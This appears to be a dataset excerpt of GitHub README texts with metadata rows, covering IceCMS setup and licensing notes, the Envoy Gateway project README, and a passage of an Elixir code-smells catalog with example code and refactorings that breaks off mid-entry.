- MySQL: as long as the database character set is `utf8mb4`, there are usually no problems (many table fields, such as "site settings" and "article details", need the `utf8mb4` character set to support emoji; otherwise, even if the SQL file imports successfully, some field contents will be incomplete and the frontend will throw errors when rendering the data).
- Make sure Maven can import the dependencies at their current versions; do not upgrade or downgrade them.
- The default username/password stored in the database is `root` / `123123`. Since this is a personal project there is no change-password page; you can generate a password manually in the `main` method of `top.naccl.util.HashUtils` and store it in the database.
- Remember to update the configuration in `application-dev.properties` under the IceCMS-main directory.
- If Redis has no password, leave it blank.
- Be sure to change `token.secretKey`, otherwise token security cannot be guaranteed.
## QQ Group
QQ group: ([951286996](https://qm.qq.com/cgi-bin/qm/qr?k=XLX0hSw6GGuOgNbC53r-Pc7Lrubwcm4q&authKey=AaNuGPfAWTSyaN6MR5yGYFQ0+4AKsZQq7kI0uRASo+v5ttyrc6xvh7gfNEMQ7UDR&noverify=0))
Telegram group: [https://t.me/+1rau4SBwFyE1OTA1](https://t.me/+1rau4SBwFyE1OTA1)
These groups are for learning and discussion; for problems with the program itself, please open an issue instead.
## Software Copyright Certificate
<div class="half">
<img alt="certificate" style="width:420px" src="https://res.cloudinary.com/dxl1idlr5/image/upload/v1689829207/%E7%99%BB%E8%AE%B0%E8%AF%81%E4%B9%A6_2023R11L0135975__mosaic_wgmw6p.jpg" width="50%">
</div>
## License
GPL-3.0 license © pipipi-pikachu
## Commercial Use
* If you want to use this project commercially for profit, I hope you will strictly follow the GPL-3.0 license.
* If you really need closed-source commercial use and cannot comply with GPL-3.0, you can either:
  * become a contributor to the project, which roughly means:
    * your code is referenced by this project as a dependency;
    * a PR you submitted has been merged into this project (only meaningful ones; simple typo or spelling fixes do not count);
    * you have participated in the design or implementation of this project (including providing valuable ideas for implementing features/modules or fixing bugs);
  * or contact the author to pay for commercial use.
## Thanks
Thanks to [JetBrains](https://www.jetbrains.com/) for providing a free license for non-commercial open-source development.
## Star History
[![Star History Chart](https://api.star-history.com/svg?repos=Thecosy/IceCMS&type=Date)](https://star-history.com/#Thecosy/IceCMS&Date)
| 🌈冰激凌内容管理系统🍦,实现MacWK资源站,社区图片视频圈子CMS,支持网页端移动端小程序🌟适合做 资讯商城,社区论坛,聊天交友 社区,博客,圈子,论坛,图片,视频,社交。 | java,mybatis,shiro,spring-boot,uniapp,vue,springboot | 0 | 1 | 0 | 153 | 10 | 1 | 0 |
envoyproxy/gateway | # Envoy Gateway
[![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/envoyproxy/gateway/badge)](https://securityscorecards.dev/viewer/?uri=github.com/envoyproxy/gateway)
[![Build and Test](https://github.com/envoyproxy/gateway/actions/workflows/build_and_test.yaml/badge.svg)](https://github.com/envoyproxy/gateway/actions/workflows/build_and_test.yaml)
[![codecov](https://codecov.io/gh/envoyproxy/gateway/branch/main/graph/badge.svg)](https://codecov.io/gh/envoyproxy/gateway)
[![CodeQL](https://github.com/envoyproxy/gateway/actions/workflows/codeql.yml/badge.svg)](https://github.com/envoyproxy/gateway/actions/workflows/codeql.yml)
[![OSV-Scanner](https://github.com/envoyproxy/gateway/actions/workflows/osv-scanner.yml/badge.svg)](https://github.com/envoyproxy/gateway/actions/workflows/osv-scanner.yml)
[![Trivy](https://github.com/envoyproxy/gateway/actions/workflows/trivy.yml/badge.svg)](https://github.com/envoyproxy/gateway/actions/workflows/trivy.yml)
Envoy Gateway is an open source project for managing Envoy Proxy as a standalone or
Kubernetes-based application gateway.
[Gateway API](https://gateway-api.sigs.k8s.io) resources are used to dynamically provision and configure the managed Envoy Proxies.
## Documentation
* [Blog][blog] introducing Envoy Gateway.
* [Goals](GOALS.md)
* [Quickstart](https://gateway.envoyproxy.io/latest/tasks/quickstart/) to use Envoy Gateway in a few simple steps.
* [Roadmap](https://gateway.envoyproxy.io/contributions/roadmap/)
## Contact
* Slack: Join the [Envoy Slack workspace][] if you're not already a member. Otherwise, use the
[Envoy Gateway channel][] to start collaborating with the community.
## Contributing
* [Code of conduct](/CODE_OF_CONDUCT)
* [Contributing guide](https://gateway.envoyproxy.io/contributions/contributing/)
* [Developer guide](https://gateway.envoyproxy.io/contributions/develop/)
## Community Meeting
The Envoy Gateway team meets every Tuesday and Thursday. We also hold a separate meeting every two weeks in a
timezone convenient for our community members in China, who often cannot make the weekly meetings.
Please refer to the meeting details for additional information.
* [Meeting details][meeting]
[meeting]: https://docs.google.com/document/d/1leqwsHX8N-XxNEyTflYjRur462ukFxd19Rnk3Uzy55I/edit?usp=sharing
[blog]: https://blog.envoyproxy.io/introducing-envoy-gateway-ad385cc59532
[Envoy Slack workspace]: https://communityinviter.com/apps/envoyproxy/envoy
[Envoy Gateway channel]: https://envoyproxy.slack.com/archives/C03E6NHLESV
| Manages Envoy Proxy as a Standalone or Kubernetes-based Application Gateway | envoy,kubernetes,gateway-api,cncf,go-control-plane,api-gateway,hacktoberfest | 17 | 431 | 2,356 | 1,990 | 222 | 18 | 14 |
lucasvegi/Elixir-Code-Smells | # [Catalog of Elixir-specific code smells][Elixir Smells]
[![Run in Livebook](https://livebook.dev/badge/v1/black.svg)](https://livebook.dev/run?url=https%3A%2F%2Fgithub.com%2Flucasvegi%2FElixir-Code-Smells%2Fblob%2Fmain%2Fcode_smells.livemd)
[![GitHub last commit](https://img.shields.io/github/last-commit/lucasvegi/Elixir-Code-Smells)](https://github.com/lucasvegi/Elixir-Code-Smells/commits/main)
[![Twitter URL](https://img.shields.io/twitter/url?style=social&url=https%3A%2F%2Fgithub.com%2Flucasvegi%2FElixir-Code-Smells)](https://twitter.com/intent/tweet?url=https%3A%2F%2Fgithub.com%2Flucasvegi%2FElixir-Code-Smells&via=lucasvegi&text=Catalog%20of%20Elixir-specific%20code%20smells%3A&hashtags=MyElixirStatus%2CElixirLang)
## Table of Contents
* __[Introduction](#introduction)__
* __[Design-related smells](#design-related-smells)__
* [GenServer Envy](#genserver-envy)
* [Agent Obsession](#agent-obsession)
* [Unsupervised process](#unsupervised-process)
* [Large messages](#large-messages)
* [Unrelated multi-clause function](#unrelated-multi-clause-function)
* [Complex extractions in clauses](#complex-extractions-in-clauses) [^*]
* [Using exceptions for control-flow](#using-exceptions-for-control-flow)
* [Untested polymorphic behaviors](#untested-polymorphic-behaviors)
* [Code organization by process](#code-organization-by-process)
* [Large code generation by macros](#large-code-generation-by-macros) [^*]
* [Data manipulation by migration](#data-manipulation-by-migration)
* [Using App Configuration for libraries](#using-app-configuration-for-libraries)
* [Compile-time global configuration](#compile-time-global-configuration)
* ["Use" instead of "import"](#use-instead-of-import)
* __[Low-level concerns smells](#low-level-concerns-smells)__
* [Working with invalid data](#working-with-invalid-data)
* [Complex branching](#complex-branching)
* [Complex else clauses in with](#complex-else-clauses-in-with) [^*]
* [Alternative return types](#alternative-return-types) [^*]
* [Accessing non-existent map/struct fields](#accessing-non-existent-mapstruct-fields)
* [Speculative Assumptions](#speculative-assumptions)
* [Modules with identical names](#modules-with-identical-names)
* [Unnecessary macros](#unnecessary-macros)
* [Dynamic atom creation](#dynamic-atom-creation) [^**]
* __[Traditional code smells][TraditionalSmells]__
* __[About](#about)__
* __[Acknowledgments](#acknowledgments)__
[^*]: These code smells were suggested by the Elixir community.
[^**]: This code smell emerged from a study with mining software repositories (MSR).
## Introduction
[Elixir][Elixir] is a functional programming language whose popularity is rising in the industry <sup>[link][ElixirInProduction]</sup>. However, there are few works in the scientific literature focused on studying the internal quality of systems implemented in this language.
In order to better understand the types of sub-optimal code structures that can harm the internal quality of Elixir systems, we scoured websites, blogs, forums, and videos (grey literature review), looking for specific code smells for Elixir that are discussed by its developers.
As a result of this investigation, we have initially proposed a catalog of 18 new smells that are specific to Elixir systems. After that, 1 new smell emerged from a study with mining software repositories (MSR) performed by us, and other smells are being suggested by the community, so this catalog is constantly being updated __(currently 23 smells)__. These code smells are categorized into two different groups ([design-related](#design-related-smells) and [low-level concerns](#low-level-concerns-smells)), according to the type of impact and code extent they affect. This catalog of Elixir-specific code smells is presented below. Each code smell is documented using the following structure:
* __Name:__ Unique identifier of the code smell. This name is important to facilitate communication between developers;
* __Category:__ The portion of code affected by smell and its severity;
* __Problem:__ How the code smell can harm code quality and what impacts this can have for developers;
* __Example:__ Code and textual descriptions to illustrate the occurrence of the code smell;
* __Refactoring:__ Ways to change smelly code in order to improve its qualities. Examples of refactored code are presented to illustrate these changes.
In addition to the Elixir-specific code smells, our catalog also documents 12 [traditional code smells][TraditionalSmells] discussed in the context of Elixir systems.
The objective of this catalog of code smells is to instigate the improvement of the quality of code developed in Elixir. For this reason, we are interested in knowing Elixir's community opinion about these code smells: *Do you agree that these code smells can be harmful? Have you seen any of them in production code? Do you have any suggestions about some Elixir-specific code smell not cataloged by us?...*
Please feel free to make pull requests and suggestions ([Issues][Issues] tab). We want to hear from you!
[▲ back to Index](#table-of-contents)
## Design-related smells
Design-related smells are more complex, affect a coarse-grained code element, and are therefore harder to detect. In this section, 14 different smells classified as design-related are explained and exemplified:
### GenServer Envy
* __Category:__ Design-related smell.
* __Problem:__ In Elixir, processes can be primitively created by ``Kernel.spawn/1``, ``Kernel.spawn/3``, ``Kernel.spawn_link/1`` and ``Kernel.spawn_link/3`` functions. Although it is possible to create them this way, it is more common to use abstractions (e.g., [``Agent``][Agent], [``Task``][Task], and [``GenServer``][GenServer]) provided by Elixir to create processes. The use of each specific abstraction is not a code smell in itself; however, there can be trouble when either a ``Task`` or ``Agent`` is used beyond its suggested purposes, being treated like a ``GenServer``.
* __Example:__ As shown next, ``Agent`` and ``Task`` are abstractions to create processes with specialized purposes. In contrast, ``GenServer`` is a more generic abstraction used to create processes for many different purposes:
* ``Agent``: As Elixir works on the principle of immutability, by default no value is shared between multiple places of code, enabling read and write as in a global variable. An ``Agent`` is a simple process abstraction focused on solving this limitation, enabling processes to share state.
* ``Task``: This process abstraction is used when we only need to execute some specific action asynchronously, often in an isolated way, without communication with other processes.
* ``GenServer``: This is the most generic process abstraction. The main benefit of this abstraction is explicitly segregating the server and the client roles, thus providing a better API for the organization of processes communication. Besides that, a ``GenServer`` can also encapsulate state (like an ``Agent``), provide sync and async calls (like a ``Task``), and more.
Examples of this code smell appear when ``Agents`` or ``Tasks`` are used for general purposes and not only for the specialized ones their documentation suggests. To illustrate some occurrences of this smell, consider two specific situations: 1) a ``Task`` is used not only to execute an action asynchronously, but also to frequently exchange messages with other processes; 2) an ``Agent``, besides sharing some global value between processes, is also frequently used to execute isolated tasks that are not of interest to other processes.
* __Refactoring:__ When an ``Agent`` or ``Task`` goes beyond its suggested use cases and becomes painful, it is better to refactor it into a ``GenServer``.
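To make the boundary between these abstractions more concrete, below is a small, hypothetical sketch (module names and logic are ours, not taken from the catalog's sources). In the smelly version, the ``Agent`` is asked to run a relatively expensive report inside ``Agent.get/2``, so the agent process behaves like a ``GenServer`` and stays blocked for every other caller while the work runs; the refactored version promotes it to an actual ``GenServer``, making the client/server roles and the handled requests explicit.
```elixir
# Hypothetical illustration of the smell and its refactoring.
defmodule Metrics.Smelly do
  use Agent

  def start_link(_opts) do
    Agent.start_link(fn -> %{} end, name: __MODULE__)
  end

  def record(key, value) do
    Agent.update(__MODULE__, &Map.put(&1, key, value))
  end

  # Smelly: an expensive, isolated computation runs inside the agent process,
  # blocking every other caller while it executes.
  def report do
    Agent.get(__MODULE__, fn state ->
      state |> Map.values() |> Enum.sort(:desc) |> Enum.take(10)
    end)
  end
end

defmodule Metrics.Refactored do
  use GenServer

  # Client API: the server/client roles are now explicit.
  def start_link(_opts), do: GenServer.start_link(__MODULE__, %{}, name: __MODULE__)
  def record(key, value), do: GenServer.cast(__MODULE__, {:record, key, value})
  def report, do: GenServer.call(__MODULE__, :report)

  # Server callbacks
  @impl true
  def init(state), do: {:ok, state}

  @impl true
  def handle_cast({:record, key, value}, state), do: {:noreply, Map.put(state, key, value)}

  @impl true
  def handle_call(:report, _from, state) do
    top = state |> Map.values() |> Enum.sort(:desc) |> Enum.take(10)
    {:reply, top, state}
  end
end
```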
[▲ back to Index](#table-of-contents)
___
### Agent Obsession
* __Category:__ Design-related smell.
* __Problem:__ In Elixir, an ``Agent`` is a process abstraction focused on sharing information between processes by means of message passing. It is a simple wrapper around shared information, thus facilitating its read and update from any place in the code. The use of an ``Agent`` to share information is not a code smell in itself; however, when the responsibility for interacting directly with an ``Agent`` is spread across the entire system, this can be problematic. This bad practice can increase the difficulty of code maintenance and make the code more prone to bugs.
* __Example:__ The following code seeks to illustrate this smell. The responsibility for interacting directly with the ``Agent`` is spread across four different modules (i.e, ``A``, ``B``, ``C``, and ``D``).
```elixir
defmodule A do
#...
def update(pid) do
#...
Agent.update(pid, fn _list -> 123 end)
#...
end
end
```
```elixir
defmodule B do
#...
def update(pid) do
#...
Agent.update(pid, fn content -> %{a: content} end)
#...
end
end
```
```elixir
defmodule C do
#...
def update(pid) do
#...
Agent.update(pid, fn content -> [:atom_value | [content]] end)
#...
end
end
```
```elixir
defmodule D do
#...
def get(pid) do
#...
Agent.get(pid, fn content -> content end)
#...
end
end
```
This spreading of responsibility can generate duplicated code and make code maintenance more difficult. Also, due to the lack of control over the format of the shared data, complex composed data can be shared. This freedom to use any format of data is dangerous and can induce developers to introduce bugs.
```elixir
# start an agent with initial state of an empty list
iex(1)> {:ok, agent} = Agent.start_link fn -> [] end
{:ok, #PID<0.135.0>}
# many data format (i.e., List, Map, Integer, Atom) are
# combined through direct access spread across the entire system
iex(2)> A.update(agent)
iex(3)> B.update(agent)
iex(4)> C.update(agent)
# state of shared information
iex(5)> D.get(agent)
[:atom_value, %{a: 123}]
```
* __Refactoring:__ Instead of spreading direct access to an ``Agent`` over many places in the code, it is better to refactor this code by centralizing the responsibility for interacting with an ``Agent`` in a single module. This refactoring improves the maintainability by removing duplicated code; it also allows you to limit the accepted format for shared data, reducing bug-proneness. As shown below, the module ``KV.Bucket`` is centralizing the responsibility for interacting with the ``Agent``. Any other place in the code that needs to access shared data must now delegate this action to ``KV.Bucket``. Also, ``KV.Bucket`` now only allows data to be shared in ``Map`` format.
```elixir
defmodule KV.Bucket do
use Agent
@doc """
Starts a new bucket.
"""
def start_link(_opts) do
Agent.start_link(fn -> %{} end)
end
@doc """
Gets a value from the `bucket` by `key`.
"""
def get(bucket, key) do
Agent.get(bucket, &Map.get(&1, key))
end
@doc """
Puts the `value` for the given `key` in the `bucket`.
"""
def put(bucket, key, value) do
Agent.update(bucket, &Map.put(&1, key, value))
end
end
```
The following are examples of how to delegate access to shared data (provided by an ``Agent``) to ``KV.Bucket``.
```elixir
# start an agent through a `KV.Bucket`
iex(1)> {:ok, bucket} = KV.Bucket.start_link(%{})
{:ok, #PID<0.114.0>}
# add shared values to the keys `milk` and `beer`
iex(2)> KV.Bucket.put(bucket, "milk", 3)
iex(3)> KV.Bucket.put(bucket, "beer", 7)
# accessing shared data of specific keys
iex(4)> KV.Bucket.get(bucket, "beer")
7
iex(5)> KV.Bucket.get(bucket, "milk")
3
```
These examples are based on code written in Elixir's official documentation. Source: [link][AgentObsessionExample]
[▲ back to Index](#table-of-contents)
___
### Unsupervised process
* __Category:__ Design-related smell.
* __Problem:__ In Elixir, creating a process outside a supervision tree is not a code smell in itself. However, when code creates a large number of long-running processes outside a supervision tree, this can make visibility and monitoring of these processes difficult, preventing developers from fully controlling their applications.
* __Example:__ The following code example seeks to illustrate a library responsible for maintaining a numerical ``Counter`` through a ``GenServer`` process outside a supervision tree. Multiple counters can be created simultaneously by a client (one process for each counter), making these unsupervised processes difficult to manage. This can cause problems with the initialization, restart, and shutdown of a system.
```elixir
defmodule Counter do
use GenServer
@moduledoc """
Global counter implemented through a GenServer process
outside a supervision tree.
"""
@doc """
Function to create a counter.
initial_value: any integer value.
pid_name: optional parameter to define the process name.
Default is Counter.
"""
def start(initial_value, pid_name \\ __MODULE__)
when is_integer(initial_value) do
GenServer.start(__MODULE__, initial_value, name: pid_name)
end
@doc """
Function to get the counter's current value.
pid_name: optional parameter to inform the process name.
Default is Counter.
"""
def get(pid_name \\ __MODULE__) do
GenServer.call(pid_name, :get)
end
@doc """
Function to changes the counter's current value.
Returns the updated value.
value: amount to be added to the counter.
pid_name: optional parameter to inform the process name.
Default is Counter.
"""
def bump(value, pid_name \\ __MODULE__) do
GenServer.call(pid_name, {:bump, value})
get(pid_name)
end
## Callbacks
@impl true
def init(counter) do
{:ok, counter}
end
@impl true
def handle_call(:get, _from, counter) do
{:reply, counter, counter}
end
def handle_call({:bump, value}, _from, counter) do
{:reply, counter, counter + value}
end
end
#...Use examples...
iex(1)> Counter.start(0)
{:ok, #PID<0.115.0>}
iex(2)> Counter.get()
0
iex(3)> Counter.start(15, C2)
{:ok, #PID<0.120.0>}
iex(4)> Counter.get(C2)
15
iex(5)> Counter.bump(-3, C2)
12
iex(6)> Counter.bump(7)
7
```
* __Refactoring:__ To ensure that clients of a library have full control over their systems, regardless of the number of processes used and the lifetime of each one, all processes must be started inside a supervision tree. As shown below, this code uses a ``Supervisor`` <sup>[link][Supervisor]</sup> as a supervision tree. When this Elixir application is started, two different counters (``Counter`` and ``C2``) are also started as child processes of the ``Supervisor`` named ``App.Supervisor``. Both are initialized with zero. By means of this supervision tree, it is possible to manage the lifecycle of all child processes (e.g., stopping or restarting each one), improving the visibility of the entire app.
```elixir
defmodule SupervisedProcess.Application do
use Application
@impl true
def start(_type, _args) do
children = [
# The counters are Supervisor children started via Counter.start(0).
%{
id: Counter,
start: {Counter, :start, [0]}
},
%{
id: C2,
start: {Counter, :start, [0, C2]}
}
]
opts = [strategy: :one_for_one, name: App.Supervisor]
Supervisor.start_link(children, opts)
end
end
#...Use examples...
iex(1)> Supervisor.count_children(App.Supervisor)
%{active: 2, specs: 2, supervisors: 0, workers: 2}
iex(2)> Counter.get(Counter)
0
iex(3)> Counter.get(C2)
0
iex(4)> Counter.bump(7, Counter)
7
iex(5)> Supervisor.terminate_child(App.Supervisor, Counter)
iex(6)> Supervisor.count_children(App.Supervisor)
%{active: 1, specs: 2, supervisors: 0, workers: 2} #only one active
iex(7)> Counter.get(Counter) #Error because it was previously terminated
** (EXIT) no process: the process is not alive...
iex(8)> Supervisor.restart_child(App.Supervisor, Counter)
iex(9)> Counter.get(Counter) #after the restart, this process can be accessed again
0
```
These examples are based on codes written in Elixir's official documentation. Source: [link][UnsupervisedProcessExample]
[▲ back to Index](#table-of-contents)
___
### Large messages
* __Category:__ Design-related smell.
* __Note:__ Formerly known as "Large messages between processes".
* __Problem:__ In Elixir, processes run in an isolated manner, often concurrently with others. Communication between different processes is performed via message passing. The exchange of messages between processes is not a code smell in itself; however, when processes exchange messages, their contents are copied between them. For this reason, if a huge structure is sent as a message from one process to another, the sender can become blocked, compromising performance. If these large message exchanges occur frequently, the prolonged and frequent blocking of processes can cause a system to behave anomalously.
* __Example:__ The following code is composed of two modules which will each run in a different process. As the names suggest, the ``Sender`` module has a function responsible for sending messages from one process to another (i.e., ``send_msg/3``). The ``Receiver`` module has a function to create a process to receive messages (i.e., ``create/0``) and another one to handle the received messages (i.e., ``run/0``). If a huge structure, such as a list with 1_000_000 different values, is sent frequently from ``Sender`` to ``Receiver``, the impacts of this smell could be felt.
```elixir
defmodule Receiver do
@doc """
Function for receiving messages from processes.
"""
def run do
receive do
{:msg, msg_received} -> msg_received
{_, _} -> "won't match"
end
end
@doc """
Create a process to receive a message.
Messages are received in the run() function of Receiver.
"""
def create do
spawn(Receiver, :run, [])
end
end
```
```elixir
defmodule Sender do
@doc """
Function for sending messages between processes.
pid_receiver: message recipient.
msg: messages of any type and size can be sent.
id_msg: used by receiver to decide what to do
when a message arrives.
Default is the atom :msg
"""
def send_msg(pid_receiver, msg, id_msg \\ :msg) do
send(pid_receiver, {id_msg, msg})
end
end
```
Examples of large messages between processes:
```elixir
iex(1)> pid = Receiver.create
#PID<0.144.0>
#Simulating a message with large content - List with length 1_000_000
iex(2)> msg = %{from: inspect(self()), to: inspect(pid), content: Enum.to_list(1..1_000_000)}
iex(3)> Sender.send_msg(pid, msg)
{:msg,
%{
content: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38,
39, 40, 41, 42, 43, 44, 45, 46, 47, ...],
from: "#PID<0.105.0>",
to: "#PID<0.144.0>"
}}
```
This example is based on original code by Samuel Mullen. Source: [link][LargeMessageExample]
[▲ back to Index](#table-of-contents)
___
### Unrelated multi-clause function
* __Category:__ Design-related smell.
* __Note:__ Formerly known as "Complex multi-clause function".
* __Problem:__ Using multi-clause functions in Elixir, to group functions of the same name, is not a code smell in itself. However, due to the great flexibility provided by this programming feature, some developers may abuse the number of guard clauses and pattern matches to group _unrelated_ functionality.
* __Example:__ A recurring example of abusing multi-clause functions is mixing too much unrelated business logic into the function definitions. This makes it difficult to read and understand the logic involved in the functions, which may impair code maintainability. Some developers use documentation mechanisms such as ``@doc`` annotations to compensate for poor code readability, but unfortunately, with a multi-clause function, we can only use these annotations once per function name, on the first (header) clause. As shown next, all other variations of the function can only be documented with comments, a mechanism that cannot be used to automate tests, leaving the code prone to bugs.
```elixir
@doc """
Update sharp product with 0 or empty count
## Examples
iex> Namespace.Module.update(...)
expected result...
"""
def update(%Product{count: nil, material: material})
when material in ["metal", "glass"] do
# ...
end
# update blunt product
def update(%Product{count: count, material: material})
when count > 0 and material in ["metal", "glass"] do
# ...
end
# update animal...
def update(%Animal{count: 1, skin: skin})
when skin in ["fur", "hairy"] do
# ...
end
```
* __Refactoring:__ As shown below, a possible solution to this smell is to break the business rules that are mixed up in a single unrelated multi-clause function in several different simple functions. Each function can have a specific ``@doc``, describing its behavior and parameters received. While this refactoring sounds simple, it can have a lot of impact on the function's current clients, so be careful!
```elixir
@doc """
Update sharp product
## Parameter
struct: %Product{...}
## Examples
iex> Namespace.Module.update_sharp_product(%Product{...})
expected result...
"""
def update_sharp_product(struct) do
# ...
end
@doc """
Update blunt product
## Parameter
struct: %Product{...}
## Examples
iex> Namespace.Module.update_blunt_product(%Product{...})
expected result...
"""
def update_blunt_product(struct) do
# ...
end
@doc """
Update animal
## Parameter
struct: %Animal{...}
## Examples
iex> Namespace.Module.update_animal(%Animal{...})
expected result...
"""
def update_animal(struct) do
# ...
end
```
This example is based on original code by Syamil MJ ([@syamilmj][syamilmj]). Source: [link][MultiClauseExample]
[▲ back to Index](#table-of-contents)
___
### Complex extractions in clauses
* __Category:__ Design-related smell.
* __Note:__ This smell was suggested by the community via issues ([#9][Complex-extraction-in-clauses-issue]).
* __Problem:__ When we use multi-clause functions, it is possible to extract values in the clauses for further usage and for pattern matching/guard checking. This extraction itself does not represent a code smell, but when you have too many clauses or too many arguments, it becomes hard to know which extracted parts are used for pattern/guards and what is used only inside the function body. This smell is related to [Unrelated multi-clause function](#unrelated-multi-clause-function), but with implications of its own. It impairs the code readability in a different way.
* __Example:__ The following code, although simple, tries to illustrate the occurrence of this code smell. The multi-clause function ``drive/1`` is extracting fields of an ``%User{}`` struct for usage in the clause expression (e.g. ``age``) and for usage in the function body (e.g., ``name``). Ideally, a function should not mix pattern matching extractions for usage in its clauses expressions and also in the function body.
```elixir
def drive(%User{name: name, age: age}) when age >= 18 do
"#{name} can drive"
end
def drive(%User{name: name, age: age}) when age < 18 do
"#{name} cannot drive"
end
```
While the example is small and looks like a clear code, try to imagine a situation where ``drive/1`` was more complex, having many more clauses, arguments, and extractions. This is the really smelly code!
* __Refactoring:__ As shown below, a possible solution to this smell is to extract only pattern/guard related variables in the signature once you have many arguments or multiple clauses:
```elixir
def drive(%User{age: age} = user) when age >= 18 do
%User{name: name} = user
"#{name} can drive"
end
def drive(%User{age: age} = user) when age < 18 do
%User{name: name} = user
"#{name} cannot drive"
end
```
This example and the refactoring are proposed by José Valim ([@josevalim][jose-valim])
[▲ back to Index](#table-of-contents)
___
### Using exceptions for control-flow
* __Category:__ Design-related smell.
* __Note:__ Formerly known as "Exceptions for control-flow".
* __Problem:__ This smell refers to code that forces developers to handle exceptions for control-flow. Exception handling itself does not represent a code smell, but this should not be the only alternative available to developers to handle an error in client code. When developers have no freedom to decide if an error is exceptional or not, this is considered a code smell.
* __Example:__ An example of this code smell, as shown below, is when a library (e.g. ``MyModule``) forces its clients to use ``try .. rescue`` statements to capture and evaluate errors. This library does not allow developers to decide if an error is exceptional or not in their applications.
```elixir
defmodule MyModule do
def janky_function(value) do
if is_integer(value) do
#...
"Result..."
else
raise RuntimeError, message: "invalid argument. Is not integer!"
end
end
end
```
```elixir
defmodule Client do
# Client forced to use exceptions for control-flow.
def foo(arg) do
try do
value = MyModule.janky_function(arg)
"All good! #{value}."
rescue
e in RuntimeError ->
reason = e.message
"Uh oh! #{reason}."
end
end
end
#...Use examples...
iex(1)> Client.foo(1)
"All good! Result...."
iex(2)> Client.foo("lucas")
"Uh oh! invalid argument. Is not integer!."
```
* __Refactoring:__ Library authors should guarantee that clients are not required to use exceptions for control-flow in their applications. As shown below, this can be done by refactoring the library ``MyModule``, providing two versions of the function that forces clients to use exceptions for control-flow (e.g., ``janky_function``). 1) a version with the raised exceptions should have the same name as the smelly one, but with a trailing ``!`` (i.e., ``janky_function!``); 2) Another version, without raised exceptions, should have a name identical to the original version (i.e., ``janky_function``), and should return the result wrapped in a tuple.
```elixir
defmodule MyModule do
@moduledoc """
Refactored library
"""
@doc """
Refactored version without exceptions for control-flow.
"""
def janky_function(value) do
if is_integer(value) do
#...
{:ok, "Result..."}
else
{:error, "invalid argument. Is not integer!"}
end
end
def janky_function!(value) do
case janky_function(value) do
{:ok, result} ->
result
{:error, message} ->
raise RuntimeError, message: message
end
end
end
```
This refactoring gives clients more freedom to decide how to proceed in the event of errors, defining what is exceptional or not in different situations. As shown next, when an error is not exceptional, clients can use specific control-flow structures, such as the ``case`` statement along with pattern matching.
```elixir
defmodule Client do
# Clients now can also choose to use control-flow structures
# for control-flow when an error is not exceptional.
def foo(arg) do
case MyModule.janky_function(arg) do
{:ok, value} -> "All good! #{value}."
{:error, reason} -> "Uh oh! #{reason}."
end
end
end
#...Use examples...
iex(1)> Client.foo(1)
"All good! Result...."
iex(2)> Client.foo("lucas")
"Uh oh! invalid argument. Is not integer!."
```
This example is based on code written by Tim Austin <sup>[neenjaw][neenjaw]</sup> and Angelika Tyborska <sup>[angelikatyborska][angelikatyborska]</sup>. Source: [link][ExceptionsForControlFlowExamples]
[▲ back to Index](#table-of-contents)
___
### Untested polymorphic behaviors
* __Category:__ Design-related smell.
* __Problem:__ This code smell refers to functions that have protocol-dependent parameters and are therefore polymorphic. A polymorphic function itself does not represent a code smell, but some developers implement these generic functions without accompanying guard clauses, allowing callers to pass parameters that do not implement the required protocol or for which the operation has no meaning.
* __Example:__ An instance of this code smell happens when a function uses ``to_string()`` to convert data received by parameter. The function ``to_string()`` uses the protocol ``String.Chars`` for conversions. Many Elixir data types (e.g., ``BitString``, ``Integer``, ``Float``, ``URI``) implement this protocol. However, as shown below, other Elixir data types (e.g., ``Map``) do not implement it and can cause an error in ``dasherize/1`` function. Depending on the situation, this behavior can be desired or not. Besides that, it may not make sense to dasherize a ``URI`` or a number as shown next.
```elixir
defmodule CodeSmells do
def dasherize(data) do
to_string(data)
|> String.replace("_", "-")
end
end
#...Use examples...
iex(1)> CodeSmells.dasherize("Lucas_Vegi")
"Lucas-Vegi"
iex(2)> CodeSmells.dasherize(10) #<= Makes sense?
"10"
iex(3)> CodeSmells.dasherize(URI.parse("http://www.code_smells.com")) #<= Makes sense?
"http://www.code-smells.com"
iex(4)> CodeSmells.dasherize(%{last_name: "vegi", first_name: "lucas"})
** (Protocol.UndefinedError) protocol String.Chars not implemented
for %{first_name: "lucas", last_name: "vegi"} of type Map
```
* __Refactoring:__ There are two main alternatives to improve code affected by this smell. __1)__ You can either remove the protocol use (i.e., ``to_string/1``), by adding multi-clauses on ``dasherize/1`` or just remove it; or __2)__ You can document that ``dasherize/1`` uses the protocol ``String.Chars`` for conversions, showing its consequences. As shown next, we refactored using the first alternative, removing the protocol and restricting ``dasherize/1`` parameter only to desired data types (i.e., ``BitString`` and ``Atom``). Besides that, we use ``@doc`` to validate ``dasherize/1`` for desired inputs and to document the behavior to some types that we think don't make sense for the function (e.g., ``Integer`` and ``URI``).
```elixir
defmodule CodeSmells do
@doc """
Function that converts underscores to dashes.
## Parameter
data: only BitString and Atom are supported.
## Examples
iex> CodeSmells.dasherize(:lucas_vegi)
"lucas-vegi"
iex> CodeSmells.dasherize("Lucas_Vegi")
"Lucas-Vegi"
iex> CodeSmells.dasherize(%{last_name: "vegi", first_name: "lucas"})
** (FunctionClauseError) no function clause matching in CodeSmells.dasherize/1
iex> CodeSmells.dasherize(URI.parse("http://www.code_smells.com"))
** (FunctionClauseError) no function clause matching in CodeSmells.dasherize/1
iex> CodeSmells.dasherize(10)
** (FunctionClauseError) no function clause matching in CodeSmells.dasherize/1
"""
def dasherize(data) when is_atom(data) do
dasherize(Atom.to_string(data))
end
def dasherize(data) when is_binary(data) do
String.replace(data, "_", "-")
end
end
#...Use examples...
iex(1)> CodeSmells.dasherize(:lucas_vegi)
"lucas-vegi"
iex(2)> CodeSmells.dasherize("Lucas_Vegi")
"Lucas-Vegi"
iex(3)> CodeSmells.dasherize(10)
** (FunctionClauseError) no function clause matching in CodeSmells.dasherize/1
```
This example is based on code written by José Valim ([@josevalim][jose-valim]). Source: [link][JoseValimExamples]
[▲ back to Index](#table-of-contents)
___
### Code organization by process
* __Category:__ Design-related smell.
* __Problem:__ This smell refers to code that is unnecessarily organized by processes. A process itself does not represent a code smell, but it should only be used to model runtime properties (e.g., concurrency, access to shared resources, event scheduling). When a process is used for code organization, it can create bottlenecks in the system.
